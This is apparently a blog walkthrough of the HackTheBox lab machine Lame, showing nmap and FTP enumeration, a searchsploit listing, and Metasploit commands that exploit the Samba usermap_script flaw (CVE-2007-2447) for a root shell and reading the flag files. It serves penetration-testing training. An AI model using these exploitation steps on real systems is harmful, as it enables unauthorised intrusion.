HackTheBox Lame Walkthrough

In this article, I will be sharing a walkthrough of Lame from HackTheBox which was the first machine released on HackTheBox. This is an easy level machine which includes exploiting CVE-2007-2447 to get a shell on the box as root user.

HackTheBox Lame Walkthrough

Initial Enumeration

I started the initial enumeration by running a port scan looking for open ports and running services. The nmap scan for me was not working at first because the host was blocking ping probes. So I added the -Pn flag in the end.

└─$ nmap -sC -sV -oN nmap/initial -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 18:53 IST
Nmap scan report for (
Host is up (0.20s latency).
Not shown: 996 filtered tcp ports (no-response)
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-07-05T09:24:25-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m19s, deviation: 2h49m43s, median: 18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.36 seconds

We have four ports open. We have FTP running on port 21, SSH on port 22 and SMB on port 139 and 445.

Enumerating FTP

First let's begin the enumeration by enumerating FTP. We have anonymous login enabled, so we can login into the FTP server without using a password.

└─$ ftp
Connected to
220 (vsFTPd 2.3.4)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
229 Entering Extended Passive Mode (|||5687|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> exit
221 Goodbye.

There were no files stored on the FTP server. So next let's move on to the SMB server.

Exploiting SMB

From the nmap scan, we know that the target has Samba smbd version 3.0.20-Debian installed. On searching on Google, I found that this version is vulnerable to Remote Code Execution (CVE-2007-2447).

I also searched on the exploitdb and found that we also have a metasploit module to exploit the same.

└─$ searchsploit Samba 3.0.2
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                  |  Path                           
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                | unix/remote/16320.rb            
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                                                                              | linux/remote/9950.rb            
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                                          | linux/remote/16859.rb           
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                                        | solaris/remote/16329.rb         
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                                                                                        | linux/dos/4732.c                
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                                                                               | multiple/dos/5712.pl            
Samba < 3.0.20 - Remote Heap Overflow                                                                                                           | linux/remote/7701.txt           
Samba < 3.0.20 - Remote Heap Overflow                                                                                                           | linux/remote/7701.txt           
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                   | linux_x86/dos/36741.py          
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results 

So let's open msfconsole and try running the exploit.

use exploit/multi/samba/usermap_script
set LHOST tun0

Hurray! we got a shell as user root. Now we can read our user and root flag. The user flag is present in the /home/makis directory and the root flag is present in the /root/directory.

cat /home/makis/user.txt

cat /root/flag.txt

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Aliz Buzas.